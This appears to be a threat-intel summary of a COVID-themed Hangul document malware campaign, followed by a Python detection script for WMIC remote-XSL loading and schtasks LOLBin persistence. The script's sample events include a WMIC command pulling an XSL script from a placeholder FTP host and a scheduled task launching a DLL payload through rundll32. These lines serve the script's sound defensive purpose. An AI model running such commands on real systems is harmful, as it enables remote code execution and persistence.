Distribution of a Hangul document titled ‘Business Stabilization Fund for Small Business Owners Affected by Coronavirus’
2020-12-15 • AhnLab • Dissemination of a Korean document titled ‘Business stabilization fund for small business owners affected by coronavirus’
AhnLab reported malicious Korean Hangul documents themed around COVID-19 small-business relief funds and procurement lures. The documents used malicious PostScript or embedded OLE objects to download or drop DLL payloads, including wscapi.dll and mss.dat. Those DLLs abused WMIC with FTP-hosted XSL scripts to run fileless code in memory, then created scheduled tasks and downloaded additional payloads. The campaign exploited public interest in pandemic-related government support, so users were advised not to open attachments from unclear sources.
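The two behaviours described above (WMIC loading a stylesheet from a remote FTP/HTTP location, then a scheduled task that launches a living-off-the-land binary) are what a process-creation log rule can catch. The following detection logic is an added example, not code from AhnLab's report: the event lines, the ftp.example.invalid host, the rundll32 parent process and the task action are all constructed for illustration, and the LOLBin list is an assumed heuristic.

```python
import re
from urllib.parse import urlparse

# Constructed process-creation events in a simplified "Image | ParentImage | CommandLine"
# form (not taken from the AhnLab report); ftp.example.invalid is a placeholder host.
SAMPLE_EVENTS = [
    r'C:\Windows\System32\wbem\WMIC.exe | C:\Windows\System32\rundll32.exe | wmic os get /format:"ftp://u:p@ftp.example.invalid/gate/run.xsl"',
    r'C:\Windows\System32\wbem\WMIC.exe | C:\Windows\explorer.exe | wmic process list brief /format:csv',
    r'C:\Windows\System32\schtasks.exe | C:\Windows\System32\rundll32.exe | schtasks /create /sc minute /mo 30 /tn Update /tr "rundll32 C:\ProgramData\mss.dat,Run"',
    r'C:\Windows\System32\schtasks.exe | C:\Windows\System32\cmd.exe | schtasks /query /tn Backup',
]

REMOTE_SCHEMES = {"ftp", "http", "https"}
FORMAT_RE = re.compile(r'/format:\s*"?([^\s"]+)', re.IGNORECASE)
TASK_ACTION_RE = re.compile(r'/tr\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)
# Assumed heuristic: LOLBins that are rarely a legitimate scheduled-task action on a workstation.
LOLBIN_ACTIONS = ("rundll32", "regsvr32", "mshta", "wmic", "powershell")

def wmic_remote_xsl(cmdline):
    """Return the URL if a WMIC command loads its /format: XSL from ftp/http(s), else None."""
    m = FORMAT_RE.search(cmdline)
    if not m:
        return None
    target = m.group(1)
    return target if urlparse(target).scheme.lower() in REMOTE_SCHEMES else None

def suspicious_task_action(cmdline):
    """Return the /tr action of a 'schtasks /create' that launches a LOLBin, else None."""
    tokens = cmdline.lower().split()
    name = tokens[0].rsplit("\\", 1)[-1] if tokens else ""
    if name not in ("schtasks", "schtasks.exe") or "/create" not in tokens:
        return None
    m = TASK_ACTION_RE.search(cmdline)
    if not m:
        return None
    action = m.group(1) or m.group(2)
    return action if any(b in action.lower() for b in LOLBIN_ACTIONS) else None

def scan_events(events):
    """Run both rules over event lines; return (rule, parent_image, detail) tuples."""
    findings = []
    for line in events:
        _, parent, cmdline = [p.strip() for p in line.split(" | ", 2)]
        url = wmic_remote_xsl(cmdline)
        if url:
            findings.append(("wmic_remote_xsl", parent, url))
        action = suspicious_task_action(cmdline)
        if action:
            findings.append(("schtasks_lolbin_action", parent, action))
    return findings
```

Only the first and third constructed events fire; the benign `/format:csv` query and the `schtasks /query` call pass through.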
Indicators of Compromise